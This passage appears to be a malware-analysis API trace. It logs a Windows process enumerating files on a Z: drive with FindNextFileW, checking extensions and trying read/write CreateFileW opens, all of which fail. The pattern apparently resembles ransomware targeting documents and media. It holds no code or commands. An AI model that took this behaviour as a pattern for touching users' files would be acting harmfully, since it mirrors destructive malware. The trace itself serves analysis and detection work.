ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xaee1, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="eMZLYEuOXmzJe.avi", cAlternateFileName="")) returned 1 [0176.462] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84d30 [0176.462] PathFindExtensionW (pszPath="Z:\\eMZLYEuOXmzJe.avi") returned=".avi" [0176.467] CreateFileW (lpFileName="Z:\\eMZLYEuOXmzJe.avi" (normalized: "z:\\emzlyeuoxmzje.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0176.469] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0176.470] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbb4840, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266a5d81, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbb4840, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x12466, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="iVoyxyaCL.doc", cAlternateFileName="")) returned 1 [0176.470] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84d30 [0176.470] PathFindExtensionW (pszPath="Z:\\iVoyxyaCL.doc") returned=".doc" [0176.475] CreateFileW (lpFileName="Z:\\iVoyxyaCL.doc" (normalized: "z:\\ivoyxyacl.doc"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0176.477] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0176.477] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbdb947, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266cce83, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbdb947, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x798b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="yPKKv7fQ4YK.mkv", cAlternateFileName="")) returned 1 [0176.477] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84d30 [0176.477] PathFindExtensionW (pszPath="Z:\\yPKKv7fQ4YK.mkv") returned=".mkv" [0176.482] CreateFileW (lpFileName="Z:\\yPKKv7fQ4YK.mkv" (normalized: "z:\\ypkkv7fq4yk.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0176.483] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0176.483] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb8d73a, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265d8c3a, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb8d73a, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xe461, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="T3PGQZ2VabtjY5.mp4", cAlternateFileName="")) returned 1 [0176.484] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84d30 [0176.484] PathFindExtensionW (pszPath="Z:\\T3PGQZ2VabtjY5.mp4") returned=".mp4" [0176.490] CreateFileW (lpFileName="Z:\\T3PGQZ2VabtjY5.mp4" (normalized: "z:\\t3pgqz2vabtjy5.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0176.491] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0176.491] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafba0fbd, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265ec4bb, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafba0fbd, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x7545, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="YMZNKV4.mkv", cAlternateFileName="")) returned 1 [0176.491] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fe0 [0176.491] PathFindExtensionW (pszPath="Z:\\YMZNKV4.mkv") returned=".mkv" [0176.497] CreateFileW (lpFileName="Z:\\YMZNKV4.mkv" (normalized: "z:\\ymznkv4.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0176.499] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fe0 | out: hHeap=0x6a0000) returned 1 [0176.500] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbc80c4, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266b9602, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbc80c4, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x11664, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ppEQNd41NzmPglbQ.ppt", cAlternateFileName="")) returned 1 [0176.500] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84d30 [0176.500] PathFindExtensionW (pszPath="Z:\\ppEQNd41NzmPglbQ.ppt") returned=".ppt" [0176.505] CreateFileW (lpFileName="Z:\\ppEQNd41NzmPglbQ.ppt" (normalized: "z:\\ppeqnd41nzmpglbq.ppt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0176.507] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0176.507] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb52db1, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265500b5, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb52db1, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x181da, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="4Qalr2j5fIEqdQ0.swf", cAlternateFileName="")) returned 1 [0176.507] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84d30 [0176.507] PathFindExtensionW (pszPath="Z:\\4Qalr2j5fIEqdQ0.swf") returned=".swf" [0176.512] CreateFileW (lpFileName="Z:\\4Qalr2j5fIEqdQ0.swf" (normalized: "z:\\4qalr2j5fieqdq0.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0176.514] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0176.515] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb83af9, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265c53b9, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb83af9, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x17557, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NZjMmNKkZjRI.png", cAlternateFileName="")) returned 1 [0176.515] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84d30 [0176.515] PathFindExtensionW (pszPath="Z:\\NZjMmNKkZjRI.png") returned=".png" [0176.520] CreateFileW (lpFileName="Z:\\NZjMmNKkZjRI.png" (normalized: "z:\\nzjmmnkkzjri.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0176.521] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0176.521] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb4916f, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265500b5, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb4916f, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x120f3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="2f5wUY1aFYJTCEwR.odp", cAlternateFileName="")) returned 1 [0176.522] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84d30 [0176.522] PathFindExtensionW (pszPath="Z:\\2f5wUY1aFYJTCEwR.odp") returned=".odp" [0176.527] CreateFileW (lpFileName="Z:\\2f5wUY1aFYJTCEwR.odp" (normalized: "z:\\2f5wuy1afyjtcewr.odp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0176.530] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0176.530] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbd1d05, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266c3242, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbd1d05, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xa155, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="tdyTR6vSlTZHl.m4a", cAlternateFileName="")) returned 1 [0176.530] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84d30 [0176.530] PathFindExtensionW (pszPath="Z:\\tdyTR6vSlTZHl.m4a") returned=".m4a" [0176.535] CreateFileW (lpFileName="Z:\\tdyTR6vSlTZHl.m4a" (normalized: "z:\\tdytr6vsltzhl.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0176.537] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0176.537] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb70276, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x26580df7, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb70276, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x80b4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="GCXxiNbD.avi", cAlternateFileName="")) returned 1 [0176.537] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fe0 [0176.537] PathFindExtensionW (pszPath="Z:\\GCXxiNbD.avi") returned=".avi" [0176.542] CreateFileW (lpFileName="Z:\\GCXxiNbD.avi" (normalized: "z:\\gcxxinbd.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0176.544] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fe0 | out: hHeap=0x6a0000) returned 1 [0176.544] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb79eb7, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x2658aa37, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb79eb7, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x5791, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="KwuGmh9JdfDxPED09.jpg", cAlternateFileName="")) returned 1 [0176.544] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f2d0 [0176.545] PathFindExtensionW (pszPath="Z:\\KwuGmh9JdfDxPED09.jpg") returned=".jpg" [0176.550] CreateFileW (lpFileName="Z:\\KwuGmh9JdfDxPED09.jpg" (normalized: "z:\\kwugmh9jdfdxped09.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0176.551] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f2d0 | out: hHeap=0x6a0000) returned 1 [0176.551] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb52db1, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x26559cf6, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb52db1, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x88b1, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="7ZwyeX1xh.doc", cAlternateFileName="")) returned 1 [0176.551] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84d30 [0176.551] PathFindExtensionW (pszPath="Z:\\7ZwyeX1xh.doc") returned=".doc" [0176.557] CreateFileW (lpFileName="Z:\\7ZwyeX1xh.doc" (normalized: "z:\\7zwyex1xh.doc"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0176.559] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0176.559] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb66634, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x26580df7, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb66634, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x13e67, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="EkCDp.xls", cAlternateFileName="")) returned 1 [0176.559] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fe0 [0176.559] PathFindExtensionW (pszPath="Z:\\EkCDp.xls") returned=".xls" [0176.564] CreateFileW (lpFileName="Z:\\EkCDp.xls" (normalized: "z:\\ekcdp.xls"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0176.566] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fe0 | out: hHeap=0x6a0000) returned 1 [0176.566] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbc80c4, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266af9c2, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbc80c4, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x11ca8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="p2b1gzQI.xls", cAlternateFileName="")) returned 1 [0176.566] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fe0 [0176.566] PathFindExtensionW (pszPath="Z:\\p2b1gzQI.xls") returned=".xls" [0176.572] CreateFileW (lpFileName="Z:\\p2b1gzQI.xls" (normalized: "z:\\p2b1gzqi.xls"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0176.574] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fe0 | out: hHeap=0x6a0000) returned 1 [0176.576] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb9737c, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265e287a, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb9737c, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xa169, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="VF8E6ekoFe4DVWHEy.flv", cAlternateFileName="")) returned 1 [0176.576] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f2d0 [0176.576] PathFindExtensionW (pszPath="Z:\\VF8E6ekoFe4DVWHEy.flv") returned=".flv" [0176.581] CreateFileW (lpFileName="Z:\\VF8E6ekoFe4DVWHEy.flv" (normalized: "z:\\vf8e6ekofe4dvwhey.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0176.583] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f2d0 | out: hHeap=0x6a0000) returned 1 [0176.583] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb8d73a, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265d8c3a, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb8d73a, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x8136, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="SSKEoPSkeN.jpg", cAlternateFileName="")) returned 1 [0176.583] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84d30 [0176.583] PathFindExtensionW (pszPath="Z:\\SSKEoPSkeN.jpg") returned=".jpg" [0176.588] CreateFileW (lpFileName="Z:\\SSKEoPSkeN.jpg" (normalized: "z:\\sskeopsken.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0176.590] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0176.590] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbc80c4, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266b9602, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbc80c4, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x10e96, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="qWCrNc.m4a", cAlternateFileName="")) returned 1 [0176.590] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fe0 [0176.590] PathFindExtensionW (pszPath="Z:\\qWCrNc.m4a") returned=".m4a" [0176.595] CreateFileW (lpFileName="Z:\\qWCrNc.m4a" (normalized: "z:\\qwcrnc.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0176.596] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fe0 | out: hHeap=0x6a0000) returned 1 [0176.596] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbaabff, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266888c0, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbaabff, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xc700, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="cgtqEFU0PAhrauJ.ods", cAlternateFileName="")) returned 1 [0176.596] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84d30 [0176.596] PathFindExtensionW (pszPath="Z:\\cgtqEFU0PAhrauJ.ods") returned=".ods" [0176.601] CreateFileW (lpFileName="Z:\\cgtqEFU0PAhrauJ.ods" (normalized: "z:\\cgtqefu0pahrauj.ods"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0176.604] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0176.604] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafba0fbd, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265ec4bb, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafba0fbd, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x6539, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Z1vXQLb4e3vCWmHziUz.mkv", cAlternateFileName="")) returned 1 [0176.604] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f2d0 [0176.604] PathFindExtensionW (pszPath="Z:\\Z1vXQLb4e3vCWmHziUz.mkv") returned=".mkv" [0176.609] CreateFileW (lpFileName="Z:\\Z1vXQLb4e3vCWmHziUz.mkv" (normalized: "z:\\z1vxqlb4e3vcwmhziuz.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0176.611] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f2d0 | out: hHeap=0x6a0000) returned 1 [0176.611] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb9737c, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265e287a, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb9737c, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x80d2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="U3BnARny7QLta.mp4", cAlternateFileName="")) returned 1 [0176.611] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84d30 [0176.611] PathFindExtensionW (pszPath="Z:\\U3BnARny7QLta.mp4") returned=".mp4" [0176.618] CreateFileW (lpFileName="Z:\\U3BnARny7QLta.mp4" (normalized: "z:\\u3bnarny7qlta.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0176.621] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0176.621] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb52db1, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x26559cf6, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb52db1, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x16804, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="7jSTZlo2FBO75BUO.wav", cAlternateFileName="")) returned 1 [0176.621] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84d30 [0176.621] PathFindExtensionW (pszPath="Z:\\7jSTZlo2FBO75BUO.wav") returned=".wav" [0176.626] CreateFileW (lpFileName="Z:\\7jSTZlo2FBO75BUO.wav" (normalized: "z:\\7jstzlo2fbo75buo.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0176.628] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0176.628] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb83af9, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265ceffa, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb83af9, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x176d6, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="OxtG5eiXbm.xls", cAlternateFileName="")) returned 1 [0176.628] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84d30 [0176.629] 